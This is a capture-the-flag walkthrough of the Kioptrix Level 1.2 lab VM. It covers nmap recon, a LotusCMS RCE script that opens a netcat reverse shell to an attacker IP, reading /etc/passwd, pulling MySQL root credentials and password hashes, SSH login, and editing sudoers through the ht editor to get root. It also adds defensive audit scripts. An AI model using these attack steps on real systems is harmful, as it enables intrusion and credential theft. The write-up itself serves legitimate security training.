First, run netdiscover to figure out which IP address hosts the Kioptrix Level 1.2 machine.
The machine's address turns out to be 192.168.1.76.
Next, scan the machine with nmap -A -sV -p- 192.168.1.76, which gives these results:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-12 20:23 EDT
Nmap scan report for 192.168.1.76
Host is up (0.00083s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:79:5B:BF (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 192.168.1.76

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.34 seconds
It looks like we have to map the IP address 192.168.1.76 to kioptrix3.com.
Let's modify /etc/hosts.
Open it with nano and add this line (hosts entries are IP address first, then the hostnames):
192.168.1.76 kioptrix3.com www.kioptrix3.com
Afterwards, run /etc/init.d/networking restart to restart the networking services.
When we browse to www.kioptrix3.com, we find that the site's CMS is LotusCMS.
Let's see what we can find on Google to exploit this.
Website for exploitation: https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh
Let's use the exploit saved on our Kali box.
I now run the exploit followed by the domain I want to connect to (which resolves to 192.168.1.76):
./lotusRCE.sh www.kioptrix3.com
In one window, I have a netcat listener on port 1234.
In the other window, the RCE exploit injects a reverse shell pointing at my LHOST, 192.168.1.97, and LPORT 1234.
The back-connect method used here is netcat -e.
Now, let's do some simple recon on the host.
hostname
Kioptrix3
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
And running cat /etc/*release* gives:
cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
Now let's list the users on the system.
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
Now let's grab loneferret's .bash_history from /home/loneferret to see if it holds any useful details.
ls -latr
total 64
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh
-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile
-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc
-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful
drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh
-rw------- 1 root root 15 Apr 15 2011 .nano_history
drwxr-xr-x 5 root root 4096 Apr 16 2011 ..
-rw-r--r-- 1 root root 224 Apr 16 2011 CompanyPolicy.README
drwxr-xr-x 3 loneferret loneferret 4096 Apr 17 2011 .
-rw-r--r-- 1 loneferret users 13 Apr 18 2011 .bash_history
Looking into .bash_history, I get:
cat .bash_history
sudo ht
exit
I also find something very interesting in CompanyPolicy.README:
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
Let's upgrade to a proper tty shell with:
python -c 'import pty; pty.spawn("/bin/sh")'
Now let's look through the web directories and see whether any of them hold sensitive information.
cd gallery
$ ls
ls
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
$ cat gconfig.php
cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
This PHP config hands us sensitive information in clear text: the MySQL username is root and the password is fuckeyou.
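As an added, defender-side example (my code, not from the original post or from the Gallarific project), here is a small audit that rebuilds the relevant part of gconfig.php in a temporary directory and reports the problems the file above exhibits: the application connects as the MySQL root account, the database password sits in the config in clear text, and, when the file mode allows it, any local user can read it. The key names are the ones the real file uses; the password value and the 0644 mode are constructed for the demo, and the finding strings are mine.

```python
import os
import re
import stat
import tempfile

# Constructed stand-in for gallery/gconfig.php. The keys are the ones the
# real file uses; the password is a placeholder, not the page's value.
CONSTRUCTED_GCONFIG = '''<?php
error_reporting(0);
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "example-placeholder";
?>
'''

# Matches lines of the form $GLOBALS["key"] = "value";
ASSIGN_RE = re.compile(r'\$GLOBALS\["(?P<key>\w+)"\]\s*=\s*"(?P<value>[^"]*)"\s*;')


def parse_globals(text):
    """Return a dict of the string assignments to $GLOBALS in a PHP config."""
    return {m.group("key"): m.group("value") for m in ASSIGN_RE.finditer(text)}


def audit_config(path):
    """Return a list of findings for a Gallarific-style config file at path."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        # Any local account, not just the web server user, can read the secrets.
        findings.append(f"world-readable (mode {oct(mode)})")
    with open(path) as fh:
        values = parse_globals(fh.read())
    if values.get("gallarific_mysql_username") == "root":
        # The web app should use a least-privilege account limited to its own database.
        findings.append("web app connects as the MySQL root user")
    if values.get("gallarific_mysql_password"):
        findings.append("clear-text database password embedded in config")
    return findings


def demo():
    """Write the constructed config with mode 0644 and audit it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "gconfig.php")
        with open(path, "w") as fh:
            fh.write(CONSTRUCTED_GCONFIG)
        os.chmod(path, 0o644)
        return audit_config(path)


if __name__ == "__main__":
    for finding in demo():
        print("FINDING:", finding)
```

On the real host the fix is a dedicated MySQL account with rights only on the gallery database, a config file readable solely by the web server's group, and no superuser credentials anywhere under the document root.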
Let's now log in to MySQL and see what we can find.
$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> use gallery;
use gallery;
Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)
mysql> select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.09 sec)
Aha. Now we have the password hash for the user loneferret.
The gallarific_users table also holds the web application's admin account, with its password stored in clear text:
mysql> select * from gallarific_users;
select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)
Instead of cracking the hash locally, let's see if we can get it faster by looking it up on www.crackstation.net.
The result is starwars, which is the password.
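Why the lookup succeeded so quickly: the dev_accounts hashes are unsalted MD5, so one precomputed table serves every user and every site. The following Python is an added example (mine, not from the original post or from Gallarific) that reproduces the lookup over a constructed four-word list against the hashes from the table above, then shows the storage format the application should have used instead: a random per-user salt with PBKDF2-HMAC-SHA256, verified with a constant-time compare. The word list and the iteration count are my assumptions.

```python
import hashlib
import hmac
import os

# Hash values copied from the dev_accounts table dumped above.
DEV_ACCOUNTS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# A tiny constructed word list standing in for the dictionaries a
# lookup service such as crackstation is built from.
CONSTRUCTED_WORDLIST = ["password", "letmein", "starwars", "admin123"]


def lookup_unsalted_md5(stored_hash, wordlist):
    """Return the word whose plain MD5 equals stored_hash, or None.

    This works only because the hash is unsalted and MD5 is fast: each
    candidate costs one hash, and the same table matches every user who
    chose that word, on this site or any other.
    """
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == stored_hash:
            return word
    return None


def make_pbkdf2_record(password, iterations=200_000):
    """Store a password as a random 16-byte salt plus PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def verify_pbkdf2_record(password, record):
    """Recompute the stretched hash with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


def salted_hashes_match(password):
    """Two records of the same password differ, so no shared lookup table applies."""
    return make_pbkdf2_record(password)["hash"] == make_pbkdf2_record(password)["hash"]


if __name__ == "__main__":
    for user, h in DEV_ACCOUNTS.items():
        print(user, "->", lookup_unsalted_md5(h, CONSTRUCTED_WORDLIST))
    rec = make_pbkdf2_record("starwars")
    print("salted verify:", verify_pbkdf2_record("starwars", rec))
    print("same password, same hash:", salted_hashes_match("starwars"))
```

The slow, salted form does not stop a user from picking a weak password, but it forces an attacker to spend the full PBKDF2 cost per guess per user instead of one table lookup, which is the property the gallery's dev_accounts table lacked.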
Now we can ssh into the server with the credentials we have just found.
user: loneferret
password: starwars
ssh loneferret@192.168.1.76
Then type starwars as the password.
Run sudo -l to see which commands loneferret may run as root:
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
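The sudo rules above are what make the rest of the escalation possible: ht is an interactive editor, so running it as root means writing any file as root, and the negated !/usr/bin/su entry is not a restriction on anything else. As an added audit example (my code, not from the original post), the following Python parses that sudo -l output and flags grants of editors or shells as root. The rule text is the page's; the set of flagged program names is a starting list I chose, not an exhaustive one.

```python
import re

# The rules printed by `sudo -l` on Kioptrix3, used here as sample input.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Programs that can write arbitrary files or spawn a shell once they run as
# root. Hypothetical starting list for the audit; extend it for your estate.
FILE_WRITERS_AND_SHELLS = {"ht", "vi", "vim", "nano", "emacs", "sh", "bash", "dash"}

# One sudo -l rule line: "(runas) TAG: TAG: command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Return one dict per rule line of `sudo -l` output; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        negated = cmd.startswith("!")
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in m.group("tags"),
            "negated": negated,
            "command": cmd.lstrip("!"),
        })
    return rules


def risky_rules(rules):
    """Return the rules that let the user run a file writer or shell as root.

    A negated entry such as !/usr/bin/su grants nothing and is skipped; it
    also does not restrict the other commands, so it offers no protection.
    """
    flagged = []
    for r in rules:
        if r["negated"] or r["runas"] not in ("root", "ALL"):
            continue
        basename = r["command"].split()[0].rsplit("/", 1)[-1]
        if r["command"] == "ALL" or basename in FILE_WRITERS_AND_SHELLS:
            flagged.append(r)
    return flagged


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        tag = "NOPASSWD " if r["nopasswd"] else ""
        print(f"RISK: ({r['runas']}) {tag}{r['command']} can rewrite files as root")
```

The remediation for a rule like this is not a longer deny list but removing the editor grant altogether: if users genuinely need to edit specific files, sudoedit with an explicit file list keeps the editor running as the unprivileged user and copies only the named file back as root.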
Next, because ht runs as root, it can edit any file we choose.
Type sudo ht.
Go to File and open /etc/sudoers.
For privilege escalation, add /bin/bash to loneferret's line, then save the file.
Now we can take advantage of this and escalate to a r00t shell by running:
sudo /bin/bash
We now have a root shell:
loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# whoami
root
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# cd /root
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:/root# cat Congrats.txt
Congrats.txt rewards us with this message:
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
Happy Rooting. :)
--Nathe